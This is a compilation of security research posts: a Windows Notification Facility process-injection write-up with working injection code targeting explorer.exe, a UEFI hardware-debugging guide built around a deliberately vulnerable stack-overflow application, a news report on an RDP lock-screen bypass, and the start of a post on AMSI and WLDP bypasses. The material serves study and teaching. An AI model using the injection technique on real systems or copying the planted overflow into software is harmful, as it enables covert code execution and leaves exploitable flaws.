Windows Process Injection: Windows Notification Facility

Original text by modexp

Introduction

At Blackhat 2018, Alex Ionescu and Gabrielle Viala presented Windows Notification Facility: Peeling the Onion of the Most Undocumented Kernel Attack Surface Yet. It’s an exceptionally well-researched presentation that I recommend you watch before reading this post. In it, they describe WNF in great detail: the functions, the data structures and how to interact with it. If you don’t wish to watch the whole video, well, you’re missing out on a cool presentation, but you can always read the slides from their talk here. Gabrielle followed up with another detailed post called Playing with the Windows Notification Facility (WNF) that is also required reading if you want to understand the internals of WNF. You can find some of their tools here, which allow dumping information about state names and subscribing for events. As suggested in the presentation, WNF can be used for code redirection/process injection, which is what I’ll describe here. wezmaster has demonstrated how to use WNF for persisting .NET payloads here.

Context Header

The table, user and name subscriptions all have a context header.

typedef struct _WNF_CONTEXT_HEADER {
    CSHORT                   NodeTypeCode;
    CSHORT                   NodeByteSize;
} WNF_CONTEXT_HEADER, *PWNF_CONTEXT_HEADER;

The NodeTypeCode field indicates the type of structure that will appear after the header. The following are some examples.

#define WNF_NODE_SUBSCRIPTION_TABLE  0x911
#define WNF_NODE_NAME_SUBSCRIPTION   0x912
#define WNF_NODE_SERIALIZATION_GROUP 0x913
#define WNF_NODE_USER_SUBSCRIPTION   0x914

For a target process, we scan all writeable areas of memory and attempt to read sizeof(WNF_SUBSCRIPTION_TABLE) bytes. For each successful read, Header.NodeTypeCode is compared with WNF_NODE_SUBSCRIPTION_TABLE while Header.NodeByteSize is compared with sizeof(WNF_SUBSCRIPTION_TABLE). The type code and byte size are specific to WNF and can be used to locate WNF structures in memory, provided no unrelated data happens to contain the same values.
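The header comparison can be sketched on a local buffer as follows. This is a minimal illustration, not the wnfscan implementation: the function name find_wnf_table, the pointer-sized scan step and the table size passed by the caller are all assumptions, and a real scanner would first copy each region out of the target with ReadProcessMemory.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define WNF_NODE_SUBSCRIPTION_TABLE 0x911

/* Mirrors WNF_CONTEXT_HEADER; CSHORT is a 16-bit signed integer. */
typedef struct {
    int16_t NodeTypeCode;
    int16_t NodeByteSize;
} wnf_context_header;

/*
 * Scan len bytes at buf for a context header whose type code is 0x911
 * and whose byte size equals table_size (hypothetical helper).
 * Candidates are assumed to be pointer-aligned.
 * Returns the byte offset of the first match, or -1 if none is found.
 */
long find_wnf_table(const uint8_t *buf, size_t len, int16_t table_size)
{
    wnf_context_header h;
    size_t off;

    for (off = 0; off + sizeof(h) <= len; off += sizeof(void *)) {
        /* memcpy avoids unaligned or aliasing-unsafe reads */
        memcpy(&h, buf + off, sizeof(h));
        if (h.NodeTypeCode == WNF_NODE_SUBSCRIPTION_TABLE &&
            h.NodeByteSize == table_size) {
            return (long)off;
        }
    }
    return -1;
}
```

Checking both fields together keeps false positives low, since a stray 0x911 alone is far more likely than the type code followed by the exact structure size.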

UPDATE: Adam suggested finding the address of the WNF table via a function referencing it. You could also search for pointers in the .data section or PEB.ProcessHeap. Each of these methods would likely be faster than searching all writeable areas of memory, which includes stack memory.

Subscription Table

Created by NTDLL.dll!RtlpInitializeWnf and assigned type 0x911. Both NTDLL.dll!RtlRegisterForWnfMetaNotification and NTDLL.dll!RtlSubscribeWnfStateChangeNotification will create the table if one doesn’t already exist. You could hijack the callback function in TP_TIMER to redirect code, but since this post is about WNF, we need to look at the other structures.

typedef struct _WNF_SUBSCRIPTION_TABLE {
    WNF_CONTEXT_HEADER                Header;
    SRWLOCK                           NamesTableLock;
    LIST_ENTRY                        NamesTableEntry;
    LIST_ENTRY                        SerializationGroupListHead;
    SRWLOCK                           SerializationGroupLock;
    DWORD                             Unknown1[2];
    DWORD                             SubscribedEventSet;
    DWORD                             Unknown2[2];
    PTP_TIMER                         Timer;
    ULONG64                           TimerDueTime;
} WNF_SUBSCRIPTION_TABLE, *PWNF_SUBSCRIPTION_TABLE;

The main field we’re interested in is the NamesTableEntry that will point to a list of WNF_NAME_SUBSCRIPTION structures.

Serialization Group

Created by NTDLL.dll!RtlpCreateSerializationGroup and assigned type 0x913. Although not important for process injection, it’s here for reference since it wasn’t described in the presentation.

typedef struct _WNF_SERIALIZATION_GROUP {
    WNF_CONTEXT_HEADER                Header;
    ULONG                             GroupId;
    LIST_ENTRY                        SerializationGroupList;
    ULONG64                           SerializationGroupValue;
    ULONG64                           SerializationGroupMemberCount;
} WNF_SERIALIZATION_GROUP, *PWNF_SERIALIZATION_GROUP;

Name Subscription

Created by NTDLL.dll!RtlpCreateWnfNameSubscription and assigned type 0x912. When subscribing for notifications, an attempt will be made to locate an existing name subscription and simply insert a user subscription into the SubscriptionsList using NTDLL.dll!RtlpAddWnfUserSubToNameSub.

typedef struct _WNF_NAME_SUBSCRIPTION {
    WNF_CONTEXT_HEADER                Header;
    ULONG64                           SubscriptionId;
    WNF_STATE_NAME_INTERNAL           StateName;
    WNF_CHANGE_STAMP                  CurrentChangeStamp;
    LIST_ENTRY                        NamesTableEntry;
    PWNF_TYPE_ID                      TypeId;
    SRWLOCK                           SubscriptionLock;
    LIST_ENTRY                        SubscriptionsListHead;
    ULONG                             NormalDeliverySubscriptions;
    ULONG                             NotificationTypeCount[5];
    PWNF_DELIVERY_DESCRIPTOR          RetryDescriptor;
    ULONG                             DeliveryState;
    ULONG64                           ReliableRetryTime;
} WNF_NAME_SUBSCRIPTION, *PWNF_NAME_SUBSCRIPTION;

The main fields we’re interested in are NamesTableEntry, which links the name subscriptions together, and SubscriptionsListHead, which heads the list of user subscriptions described next.
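Walking these lists means turning a LIST_ENTRY pointer back into the structure that contains it. The sketch below shows that step on local memory with trimmed stand-in types; name_sub, CONTAINER_OF and find_name_sub are hypothetical names for illustration. Against a remote process, every Flink would have to be fetched with ReadProcessMemory before it could be followed.

```c
#include <stddef.h>
#include <stdint.h>

/* Same shape as the Windows LIST_ENTRY. */
typedef struct list_entry {
    struct list_entry *Flink;
    struct list_entry *Blink;
} list_entry;

/* Trimmed stand-in for WNF_NAME_SUBSCRIPTION (assumption: only the
 * two fields needed for the walk are kept). */
typedef struct {
    uint64_t   StateName;
    list_entry NamesTableEntry;
} name_sub;

/* Equivalent in spirit to the CONTAINING_RECORD macro. */
#define CONTAINER_OF(ptr, type, field) \
    ((type *)((char *)(ptr) - offsetof(type, field)))

/* Walk the circular list starting at head and return the entry whose
 * StateName matches, or NULL if the list does not contain it. */
name_sub *find_name_sub(list_entry *head, uint64_t state_name)
{
    list_entry *e;

    for (e = head->Flink; e != head; e = e->Flink) {
        name_sub *ns = CONTAINER_OF(e, name_sub, NamesTableEntry);
        if (ns->StateName == state_name) {
            return ns;
        }
    }
    return NULL;
}
```

The same pattern applies one level down: SubscriptionsListHead is the head, and each node is the SubscriptionsListEntry field of a user subscription.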

User Subscription

Created by NTDLL.dll!RtlpCreateWnfUserSubscription and assigned type 0x914. This is the main structure one would want to modify for process injection or code redirection.

typedef struct _WNF_USER_SUBSCRIPTION {
    WNF_CONTEXT_HEADER                Header;
    LIST_ENTRY                        SubscriptionsListEntry;
    PWNF_NAME_SUBSCRIPTION            NameSubscription;
    PWNF_USER_CALLBACK                Callback;
    PVOID                             CallbackContext;
    ULONG64                           SubProcessTag;
    ULONG                             CurrentChangeStamp;
    ULONG                             DeliveryOptions;
    ULONG                             SubscribedEventSet;
    PWNF_SERIALIZATION_GROUP          SerializationGroup;
    ULONG                             UserSubscriptionCount;
    ULONG64                           Unknown[10];
} WNF_USER_SUBSCRIPTION, *PWNF_USER_SUBSCRIPTION;

We’re interested in the Callback and CallbackContext fields. If the context pointed to a virtual function table and one of the methods was executed upon receiving a notification from the kernel, then it probably wouldn’t require modifying Callback at all. To make things easier, the PoC only modifies the Callback value.
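To see where a write to Callback would land, the leading fields of the structure can be laid out with fixed-width types. This is a sketch under stated assumptions: a 64-bit target, natural alignment, and mock type names (mock_header, mock_list_entry64, mock_user_sub64) that do not exist in any Windows header. Under those assumptions Callback sits at offset 0x20 and CallbackContext at 0x28.

```c
#include <stddef.h>
#include <stdint.h>

/* 64-bit stand-ins for the Windows types; pointers become uint64_t. */
typedef struct {
    int16_t NodeTypeCode;
    int16_t NodeByteSize;
} mock_header;

typedef struct {
    uint64_t Flink;
    uint64_t Blink;
} mock_list_entry64;

/* Leading fields of WNF_USER_SUBSCRIPTION in the order listed above. */
typedef struct {
    mock_header       Header;                 /* 4 bytes + 4 padding */
    mock_list_entry64 SubscriptionsListEntry;
    uint64_t          NameSubscription;
    uint64_t          Callback;
    uint64_t          CallbackContext;
} mock_user_sub64;

/* Given the remote address of a user subscription, return the address
 * of its Callback field (hypothetical helper). */
uint64_t callback_field_address(uint64_t user_sub_address)
{
    return user_sub_address + offsetof(mock_user_sub64, Callback);
}
```

Using offsetof rather than a hard-coded constant keeps the calculation correct if the structure definition is adjusted for another Windows build.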

Callback Prototype

Six parameters are passed to a callback procedure. Both Buffer and CallbackContext could be utilized to pass in arbitrary code or commands, but since the PoC only executes notepad.exe, the parameters are ignored. That being said, it’s still important to use the same prototype for a payload so that the parameters are safely removed from the stack before returning to the caller.

typedef NTSTATUS (*PWNF_USER_CALLBACK) (
    _In_     WNF_STATE_NAME   StateName,
    _In_     WNF_CHANGE_STAMP ChangeStamp,
    _In_opt_ PWNF_TYPE_ID     TypeId,
    _In_opt_ PVOID            CallbackContext,
    _In_     PVOID            Buffer,
    _In_     ULONG            BufferSize);

Listing Subscriptions

To help locate the WNF subscription table in a remote process, I wrote a simple tool called wnfscan that searches all writeable areas of memory for the context header. Once found, it parses and displays a list of name and user subscriptions.

Process Injection

Because we have to locate the WNF subscription table by scanning memory, this method of injection is more complicated than others. We don’t search for WNF_USER_SUBSCRIPTION structures because they appear higher up in memory and take too long to find. Scanning for the table first is much faster since it’s usually created when the process starts, thus appearing lower in memory. Once the table is found, the name subscriptions are read and a user subscription is returned.

VOID wnf_inject(LPVOID payload, DWORD payloadSize) {
    WNF_USER_SUBSCRIPTION  us;
    LPVOID                 sa, cs;
    HWND                   hw;
    HANDLE                 hp;
    DWORD                  pid;
    SIZE_T                 wr;
    ULONG64                ns = WNF_SHEL_APPLICATION_STARTED;
    NtUpdateWnfStateData_t _NtUpdateWnfStateData;
    HMODULE                m;
      
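    // 1. Open explorer.exe (bail out if the shell window or process is unavailable)
    hw = FindWindow(L"Shell_TrayWnd", NULL);
    if (hw == NULL) return;
    GetWindowThreadProcessId(hw, &pid);
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (hp == NULL) return;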
    
    // 2. Locate user subscription
    sa = GetUserSubFromProcess(hp, &us, WNF_SHEL_APPLICATION_STARTED);

    // 3. Allocate RWX memory and write payload
    cs = VirtualAllocEx(hp, NULL, payloadSize,
        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    
    // 4. Update callback and trigger execution of payload
    WriteProcessMemory(
      hp, 
      (PBYTE)sa + offsetof(WNF_USER_SUBSCRIPTION, Callback), 
      &cs,
      sizeof(ULONG_PTR),
      &wr);
      
    m = GetModuleHandle(L"ntdll");
    _NtUpdateWnfStateData = 
      (NtUpdateWnfStateData_t)GetProcAddress(m, "NtUpdateWnfStateData");
      
    _NtUpdateWnfStateData(
      &ns, NULL, 0, 0, NULL, 0, 0);
      
    // 5. Restore original callback, free memory and close process
    WriteProcessMemory(
      hp, 
      (PBYTE)sa + offsetof(WNF_USER_SUBSCRIPTION, Callback), 
      &us.Callback,
      sizeof(ULONG_PTR),
      &wr);
    // MEM_RELEASE must be used on its own, with a size of zero
    VirtualFreeEx(hp, cs, 0, MEM_RELEASE);
    CloseHandle(hp);
}

Summary

Since it’s possible to transfer data into the address space of a remote process via WNF publishing, it may be possible to avoid using VirtualAllocEx and WriteProcessMemory. Some .NET processes allocate executable memory with write permissions that could be misused by an external process for code injection. A PoC that executes notepad can be found here.


Debug UEFI code by single-stepping your Coffee Lake-S hardware CPU

Original text by Teddy Reed V

In this post I will cover:

  • Configuring an ASRock H370M-ITX/ac to allow DCI DbC debugging
  • Using Intel System Studio and System Debugger to single-step a Coffee Lake-S i7-8700 CPU
  • Debugging an example exploitable UEFI application on hardware

USB DCI DbC Debugging (JTAG over USB3)

TL;DR, if you have a newer CPU & chipset you can purchase a $15 off-the-shelf cable and single-step your hardware threads. The cable is a USB 3.0 debugging cable, similar to an Ethernet crossover cable in the sense that the internal wiring is crossed. Be careful with this cable, as unsupported machines will have undefined behavior due to the electronics of USB.

Newer Intel CPUs support debugging over USB3 via a proprietary Direct Connection Interface (DCI) with the use of off-the-shelf hardware. This applies to some 6th-generation CPU and chipset combinations, and most 7th-generation and newer setups. I have not found the specific CPU/chipset combinations, but my educated guess from the Core series is as follows:

  • Kaby Lake / Intel 100 or 200 series SunrisePoint
  • Coffee Lake-S / Intel Z370, H370, H310, or B360
  • Kaby Lake R / 6th-gen Intel Core
  • Whiskey Lake-U (8565U, 8265U, 8145U)
  • Coffee Lake-S / H370, H310, B360

These combinations should support “DCI USB 3.x Debug Class” debugging. This means you only need the inexpensive debug cable linked above. Note that if debug-cable debugging is not supported then a proprietary interposing device, purchased from Intel, is required.

From the documentation I’ve read, the USB3 hardware on a supported machine decodes DCI commands and forwards them to an appropriate hardware module on the target CPU that translates them to JTAG sequences. Intel provides the free-to-use, renewably-licenced Intel System Studio and System Debugger software along with a DCI implementation called OpenDCI. This debugging environment is built with Eclipse and supported on macOS, Linux, and Windows. I’ve only found OpenDCI support for DbC-compatible targets on the Windows version.

You will need a Windows 10 install and Intel System Studio if you are following along.

Enable DCI on the ASRock H370M-ITX/ac

TL;DR you will need to enable and disable undocumented settings within UEFI by flipping several bits in a UEFI variable.

If you are doing casual research on DCI you will find several references to using a BIOS version with DCI enabled or using a UEFI debug build. I am sure they will be very helpful but it is not possible to acquire this in a general sense. However, we can still follow guidance on “modding” our UEFI to enable DCI. I found eiselekd’s DCI-enable guidance extremely helpful.

  1. Use chipsec to dump your SPI contents to disk. e.g., chipsec_util spi dump rom.bin
  2. Open rom.bin with UEFITool and extract GUID 899407D7-99FE-43D8-9A21-79EC328CAC21 (the Setup UEFI variable).
  3. Use IFRExtractor to print a textual representation of the variable options.

The variable settings required for the H370M-ITX/ac are as follows, tested on the 3.10 and 4.00 UEFI releases:

  • Enable/Disable IED (Intel Enhanced Debug): offset 0x960, set to enabled 0x1
  • CPU Run Control: offset 0x663, set to enabled 0x1
  • CPU Run Control Lock: offset 0x664, set to disabled 0x0
  • Platform Debug Connect: offset 0x114F, set to 0x03 to enable DCI DbC
  • xDCI Support: offset 0xABD, set to enabled 0x1

To modify and save these offsets follow the guidance above to use the UEFI Shell and RU.efi application by James Wang.
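The five byte changes listed above can be expressed as a small patch table applied to an in-memory copy of the Setup variable. This is only a sketch: the function name apply_dci_patches is hypothetical, the offsets are the ones given above for the H370M-ITX/ac on UEFI 3.10 and 4.00 and would need to be re-derived with IFRExtractor for any other firmware, and writing the variable back (done with RU.efi in this post) is out of scope.

```c
#include <stddef.h>
#include <stdint.h>

typedef struct {
    size_t  offset;   /* byte offset inside the Setup variable */
    uint8_t value;    /* value required to enable DCI DbC */
} setup_patch;

/* Offsets and values as listed for the H370M-ITX/ac. */
static const setup_patch k_dci_patches[] = {
    { 0x960,  0x01 },  /* IED (Intel Enhanced Debug): enabled */
    { 0x663,  0x01 },  /* CPU Run Control: enabled */
    { 0x664,  0x00 },  /* CPU Run Control Lock: disabled */
    { 0x114F, 0x03 },  /* Platform Debug setting: DCI DbC */
    { 0xABD,  0x01 },  /* xDCI Support: enabled */
};

/*
 * Apply every patch to the buffer. Returns the number of bytes that
 * actually changed, or -1 (leaving the buffer untouched) if any offset
 * falls outside the buffer.
 */
int apply_dci_patches(uint8_t *setup, size_t len)
{
    size_t n = sizeof(k_dci_patches) / sizeof(k_dci_patches[0]);
    size_t i;
    int changed = 0;

    for (i = 0; i < n; i++) {
        if (k_dci_patches[i].offset >= len) {
            return -1;
        }
    }
    for (i = 0; i < n; i++) {
        if (setup[k_dci_patches[i].offset] != k_dci_patches[i].value) {
            setup[k_dci_patches[i].offset] = k_dci_patches[i].value;
            changed++;
        }
    }
    return changed;
}
```

Validating all offsets before writing any of them avoids leaving the variable half-patched, which matters when a wrong firmware layout could otherwise produce an unbootable configuration.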

You can confirm that DCI is enabled by reading the USB3 device class label when you connect the debug cable to your host and target machines. The host should have Intel System Studio installed and the target is the H370M-ITX/ac. The host USB driver will read “Intel USB Native Debug Class Devices” if DCI is enabled. If there is an error you will see “Port Reset Failed”. An easy way to view the detailed USB device information is with USB Tree View. Chipsec will also report if DCI is enabled, but I found that DbC-specific availability is not reported, so use the USB device driver selection in Windows to confirm the UEFI options are set correctly.

Single-stepping the i7-8700

To recap the requirements and setup:

  • You have a host machine running Windows 10 with Intel System Studio installed
  • The host machine and target i7-8700/H370M-ITX/ac are connected via a USB3 DbC cable
  • The host machine shows a connected “Intel USB Native Debug Class Device” USB device

Interrupt the target machine’s boot such that you enter UEFI Setup (press F2). This is not required but it will help while following along with the address space and other layout details. I have not figured out how to halt the CPU on reset with DCI and DbC.

In Intel System Studio you should open System Debugger and configure your target connection to use “8th Gen Intel Core Processors (Coffee Lake-S) _ Intel H370 Chipset Intel H310 Chipset Intel B360 Chipset for Consumer (Cannon Lake PCH)” using the connection method “Intel(R) DCI USB 3.x Debug Class”.

Upon success you will see status output similar to the following:

22:02:20 [INFO ] TCA - IPConnection: Open Connection, configuration: CFL_CNP_OpenDCI_DBC_Only_ReferenceSettings.
22:02:57 [INFO ] Starting DAL ...
22:02:57 [DAL  ] The system cannot find the batch label specified - SetScriptPath
22:02:58 [DAL  ] Registering MasterFrame...
22:03:00 [DAL  ] Using Intel DAL 1.1905.602.100 
22:03:00 [DAL  ] Using python.exe 2.7.15 (64bit), .NET 2.0.50727.8940, Python.NET 2.0.19, pyreadline 2.1.1
22:03:02 [DAL  ]     Note:    The 'coregroupsactive' control variable has been set to 'GPC'
22:03:10 [DAL  ] Using CFL_CNP_OpenDCI_DBC_Only_ReferenceSettings
22:03:10 [DAL  ] >>? DAL startup completed
22:03:10 [INFO ] Connection Manager: Status change: CONNECTED
    Connection: 8th Gen Intel Core Processors (Coffee Lake-S) _ Intel H370 Chipset Intel H310 Chipset Intel B360 Chipset for Consumer (Cannon Lake PCH)
    Target: 8th Gen Intel Core Processors (Coffee Lake-S) / Intel H370 Chipset, Intel H310 Chipset, Intel B360 Chipset for Consumer (Cannon Lake PCH)
    Connection Method: Intel(R) DCI USB 3.x Debug Class

And output similar to the following screen captures:

The connection will also pause the CPU threads and show you the nearby disassembly. If the CPU is not paused and clicking the “pause” button fails, you have not enabled DCI completely. For example, if you encounter either ExecutionControlUnableToHaltAllException or operation not allowed while the processor is in state 'running', then double-check the UEFI Setup variable options.

A successful connection will show a UI similar to the following:

You can now view and inspect memory and use other common JTAG-debugging features.

Debugging an example exploitable UEFI application on hardware

TL;DR this is extremely simple and thus a great toy example, due to the lack of platform runtime security in UEFI and lack of build and compile security in the UEFI development kit (EDK/UDK).

The goal is to build a “toy” vulnerable UEFI application, trigger the exploitation, and observe the behavior within the System Debugger on the connected host. The first step is to configure the edk2 build environment. This is well-documented in several places.

I will modify the HelloWorld application and replace the MdeModulePkg/Application/HelloWorld/HelloWorld.c with the following content.

#include <Uefi.h>
#include <Library/UefiLib.h>
#include <Library/UefiApplicationEntryPoint.h>

#include <Protocol/LoadedImage.h>
#include <Library/UefiBootServicesTableLib.h>
#include <Library/MemoryAllocationLib.h>

VOID RunAsm();

CHAR16* GetArgv(IN EFI_HANDLE ImageHandle)
{
  EFI_LOADED_IMAGE* li;
  EFI_GUID loaded_image_protocol = LOADED_IMAGE_PROTOCOL;
  gBS->HandleProtocol(ImageHandle, &loaded_image_protocol, (void**) &li);

  CHAR16* wargv = (CHAR16 *)li->LoadOptions;
  return wargv;
}

VOID RunMe()
{
  Print(L"You win\n");
  RunAsm();
}

UINT32 StrLenChar(CHAR8* src) {
  UINT32 ret = 0;
  while (src[ret++] != 0) {}
  return ret - 1;
}

VOID StrCpy(CHAR8* dst, CHAR16* src, UINT32 length) {
  CHAR8 *src8 = (CHAR8*)src;
  for (UINT32 i = 0; i < length; i++) {
    dst[i] = src8[(i*2)];
  }

  UINT64 loc = (UINT64)&RunMe;
  dst[length - 1] = 0;
  dst[length - 2] = 0;
  dst[length - 3] = 0;
  dst[length - 4] = 0;
  dst[length - 5] = ((loc >> (8 * 3)) & 0xFF);
  dst[length - 6] = ((loc >> (8 * 2)) & 0xFF);
  dst[length - 7] = ((loc >> (8 * 1)) & 0xFF);
  dst[length - 8] = ((loc >> (8 * 0)) & 0xFF);
}

 __attribute__((noinline)) VOID
 TestBufferOverflow(CHAR16* input)
 {
  /* Test stack buffer overflow */

  // Compiled with EDKII that auto-adds (-fno-stack-protector)
  CHAR8 buffer[32];
  StrCpy((CHAR8*)buffer, input, StrLen(input));
  buffer[StrLen(input)] = 0;
}

EFI_STATUS EFIAPI UefiMain (
  IN EFI_HANDLE        ImageHandle,
  IN EFI_SYSTEM_TABLE  *SystemTable
) {
  // Run with: fs0:X64\HelloWorld.efi A*222

  Print(L"UefiMain=0x%p\n", &UefiMain);
  CHAR16* wargv = GetArgv(ImageHandle);
  UINT32 wargv_len = StrLen(wargv);
  TestBufferOverflow(wargv);

  return EFI_SUCCESS;
}

The specific build command is

$ . ./edksetup.sh BaseTools
$ build -m MdeModulePkg/Application/HelloWorld/HelloWorld.inf -p MdeModulePkg/MdeModulePkg.dsc

And if you would like to test that this runs follow the QEMU debugging guide and use:

$ qemu-system-x86_64 -bios /usr/share/OVMF/OVMF_PURE_EFI.fd -display none -nodefaults -serial stdio -hda fat:Build/MdeModule/DEBUG_GCC5

The code above is a synthetic stack-based buffer overflow example. It will auto-fill the overwritten ret address for you. If you want to learn what is happening here please read Dhaval’s articles on Buffer Overflows. As a note, we could choose to make this more realistic (e.g., remove the auto-filled ret) by reading a file into the vulnerable stack variable.

The default edk2 build configuration will compile the overflow into the following flow, where the StrCpy logic is inlined:

Our goal is to copy 0x30 characters into the buffer, overflowing the expected 0x20, the 8 for the saved RBX, and 16 for RSP and RIP; at which point the final 8 will be filled in with the address of RunMe.

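For some fast feedback we’ll print to ConsoleOut, then reset the CPU by writing 0xFE (254) to I/O port 0x64 (100), which asks the keyboard controller to pulse the reset line: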

ASM_GLOBAL ASM_PFX(RunAsm)
ASM_PFX(RunAsm):
    mov $254, %al
    out %al, $100
    ret

If a console is not available then this functions well for blind-testing control of rip.

Because we are printing the location of UefiMain we can both confirm that each time the application is executed the address is constant and know what location to set a hardware breakpoint in System Debugger so we can single-step and watch the overflow.

For my UEFI build this location was 0x600BC69C, which means the .text section is loaded at 0x600BB000, as this subroutine sits at offset 0x169C within it. From here we can add more breakpoints in System Debugger.
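The address arithmetic is simple enough to script when placing further breakpoints. A minimal sketch, with hypothetical helper names: subtract a symbol's offset from its printed runtime address to get the load base, then add any other symbol's offset to that base.

```c
#include <stdint.h>

/* Load base of .text, given one symbol's runtime address and its
 * offset inside the section (both taken from this post's build). */
uint64_t text_base(uint64_t runtime_addr, uint64_t symbol_offset)
{
    return runtime_addr - symbol_offset;
}

/* Runtime address of any other symbol once the base is known. */
uint64_t runtime_address(uint64_t base, uint64_t symbol_offset)
{
    return base + symbol_offset;
}
```

With the values above, text_base(0x600BC69C, 0x169C) gives 0x600BB000; offsets for other functions would come from the build's map file or disassembly.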

Unpatched Bug Let Attackers Bypass Windows Lock Screen On RDP Sessions

Original text by Swati Khandelwal

A security researcher today revealed details of a new unpatched vulnerability in Microsoft Windows Remote Desktop Protocol (RDP).

Tracked as CVE-2019-9510, the reported vulnerability could allow client-side attackers to bypass the lock screen on remote desktop (RD) sessions.

Discovered by Joe Tammariello of Carnegie Mellon University Software Engineering Institute (SEI), the flaw exists when Microsoft Windows Remote Desktop feature requires clients to authenticate with Network Level Authentication (NLA), a feature that Microsoft recently recommended as a workaround against the critical BlueKeep RDP vulnerability.

According to Will Dormann, a vulnerability analyst at the CERT/CC, if a network anomaly triggers a temporary RDP disconnect while a client is already connected to the server but the login screen is locked, then “upon reconnection the RDP session will be restored to an unlocked state, regardless of how the remote system was left.”

“Starting with Windows 10 1803 and Windows Server 2019, Windows RDP handling of NLA-based RDP sessions has changed in a way that can cause unexpected behavior with respect to session locking,” Dormann explains in an advisory published today.

“Two-factor authentication systems that integrate with the Windows login screen, such as Duo Security MFA, are also bypassed using this mechanism. Any login banners enforced by an organization will also be bypassed.”

The CERT describes the attack scenario as the following:

  • A targeted user connects to a Windows 10 or Server 2019 system via RDS.
  • The user locks the remote session and leaves the client device unattended.
  • At this point, an attacker with access to the client device can interrupt its network connectivity and gain access to the remote system without needing any credentials.

This means that exploiting this vulnerability is trivial, as an attacker just needs to interrupt the network connectivity of a targeted system.

However, since the attacker requires physical access to such a targeted system (i.e., an active session with a locked screen), the scenario itself limits the attack surface to a great extent.

Tammariello notified Microsoft of the vulnerability on April 19, but the company responded by saying the “behavior does not meet the Microsoft Security Servicing Criteria for Windows,” which means the tech giant has no plans to patch the issue anytime soon.

However, users can protect themselves against potential exploitation of this vulnerability by locking the local system instead of the remote system, and by disconnecting the remote desktop sessions instead of just locking them.



How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code

Original text by modexp

1. Introduction

Version 4.8 of the .NET Framework uses Antimalware Scan Interface (AMSI) and Windows Lockdown Policy (WLDP) to block potentially unwanted software running from memory. WLDP will verify the digital signature of dynamic code while AMSI will scan for software that is either harmful or blocked by the administrator. This post documents three publicly-known methods red teams currently use to bypass AMSI and one to bypass WLDP. The bypass methods described are somewhat generic and don’t require special knowledge of AMSI or WLDP. If you’re reading this post anytime after June 2019, the methods may no longer work. The research of AMSI and WLDP was conducted in collaboration with TheWover.

2. Previous Research

The following table includes links to past research about AMSI and WLDP. If you feel I’ve missed anyone, don’t hesitate to e-mail me the details.

Date      Article
May 2016  Bypassing Amsi using PowerShell 5 DLL Hijacking by Cneelis
Jul 2017  Bypassing AMSI via COM Server Hijacking by Matt Nelson
Jul 2017  Bypassing Device Guard with .NET Assembly Compilation Methods by Matt Graeber
Feb 2018  AMSI Bypass With a Null Character by Satoshi Tanda
Feb 2018  AMSI Bypass: Patching Technique by CyberArk (Avi Gimpel and Zeev Ben Porat)
Feb 2018  The Rise and Fall of AMSI by Tal Liberman (Ensilo)
May 2018  AMSI Bypass Redux by Avi Gimpel (CyberArk)
Jun 2018  Exploring PowerShell AMSI and Logging Evasion by Adam Chester
Jun 2018  Disabling AMSI in JScript with One Simple Trick by James Forshaw
Jun 2018  Documenting and Attacking a Windows Defender Application Control Feature the Hard Way – A Case Study in Security Research Methodology by Matt Graeber
Oct 2018  How to bypass AMSI and execute ANY malicious Powershell code by Andre Marques
Oct 2018  AmsiScanBuffer Bypass (Part 1, Part 2, Part 3, Part 4) by Rasta Mouse
Dec 2018  PoC function to corrupt the g_amsiContext global variable in clr.dll by Matt Graeber
Apr 2019  Bypassing AMSI for VBA by Pieter Ceelen (Outflank)

3. AMSI Example in C

Given the path to a file, the following function will open it, map it into memory and use AMSI to detect if the contents are harmful or blocked by the administrator.

typedef HRESULT (WINAPI *AmsiInitialize_t)(
  LPCWSTR      appName,
  HAMSICONTEXT *amsiContext);

typedef HRESULT (WINAPI *AmsiScanBuffer_t)(
  HAMSICONTEXT amsiContext,
  PVOID        buffer,
  ULONG        length,
  LPCWSTR      contentName,
  HAMSISESSION amsiSession,
  AMSI_RESULT  *result);

typedef void (WINAPI *AmsiUninitialize_t)(
  HAMSICONTEXT amsiContext);
  
BOOL IsMalware(const char *path) {
    AmsiInitialize_t   _AmsiInitialize;
    AmsiScanBuffer_t   _AmsiScanBuffer;
    AmsiUninitialize_t _AmsiUninitialize;
    HAMSICONTEXT       ctx;
    AMSI_RESULT        res;
    HMODULE            amsi;
    
    HANDLE             file, map, mem;
    HRESULT            hr = -1;
    DWORD              size, high;
    BOOL               malware = FALSE;
    
    // load amsi library
    amsi = LoadLibrary("amsi");
    
    // resolve functions
    _AmsiInitialize = 
      (AmsiInitialize_t)
      GetProcAddress(amsi, "AmsiInitialize");
    
    _AmsiScanBuffer =
      (AmsiScanBuffer_t)
      GetProcAddress(amsi, "AmsiScanBuffer");
      
    _AmsiUninitialize = 
      (AmsiUninitialize_t)
      GetProcAddress(amsi, "AmsiUninitialize");
      
    // return FALSE on failure
    if(_AmsiInitialize   == NULL ||
       _AmsiScanBuffer   == NULL ||
       _AmsiUninitialize == NULL) {
      printf("Unable to resolve AMSI functions.\n");
      return FALSE;
    }
    
    // open file for reading
    file = CreateFile(
      path, GENERIC_READ, FILE_SHARE_READ,
      NULL, OPEN_EXISTING, 
      FILE_ATTRIBUTE_NORMAL, NULL); 
    
    if(file != INVALID_HANDLE_VALUE) {
      // get size
      size = GetFileSize(file, &high);
      if(size != 0) {
        // create mapping
        map = CreateFileMapping(
          file, NULL, PAGE_READONLY, 0, 0, 0);
          
        if(map != NULL) {
          // get pointer to memory
          mem = MapViewOfFile(
            map, FILE_MAP_READ, 0, 0, 0);
            
          if(mem != NULL) {
            // scan for malware
            hr = _AmsiInitialize(L"AMSI Example", &ctx);
            if(hr == S_OK) {
              hr = _AmsiScanBuffer(ctx, mem, size, NULL, 0, &res);
              if(hr == S_OK) {
                malware = (AmsiResultIsMalware(res) || 
                           AmsiResultIsBlockedByAdmin(res));
              }
              _AmsiUninitialize(ctx);
            }              
            UnmapViewOfFile(mem);
          }
          CloseHandle(map);
        }
      }
      CloseHandle(file);
    }
    return malware;
}

Scanning a good and bad file.

If you’re already familiar with the internals of AMSI, you can skip to the bypass methods here.

4. AMSI Context

The context is an undocumented structure, but you may use the following to interpret the handle returned.

typedef struct tagHAMSICONTEXT {
  DWORD        Signature;          // "AMSI" or 0x49534D41
